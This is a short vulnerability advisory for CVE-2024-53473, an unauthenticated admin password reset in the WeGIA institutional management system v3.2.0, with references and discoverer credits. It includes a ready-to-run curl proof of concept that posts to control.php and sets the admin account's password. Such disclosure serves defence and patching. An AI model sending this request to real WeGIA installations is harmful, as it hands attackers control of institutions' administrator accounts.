CVE-2024-53473:Broken Access Control

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

Affected Product Code Base

WeGIA - v3.2.0

Vulnerability Description

A critical vulnerability was identified in the web application WeGIa. This vulnerability allows an attacker to change the password of the admin user by sending a POST request to the control.php endpoint without requiring authentication or authorization.

POC

Burp Request:

Curl Request:

curl -X POST https://demo.wegia.org/controle/control.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Origin: https://demo.wegia.org" \
  --data-raw "nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"

Reference

https://github.com/nilsonLazarin/WeGIA/issues/791

https://www.wegia.org

https://github.com/nilsonmori/WeGIA

Discoverer

Natan Maia Morette and Diego Cardoso Borda Castro, Nov 2024.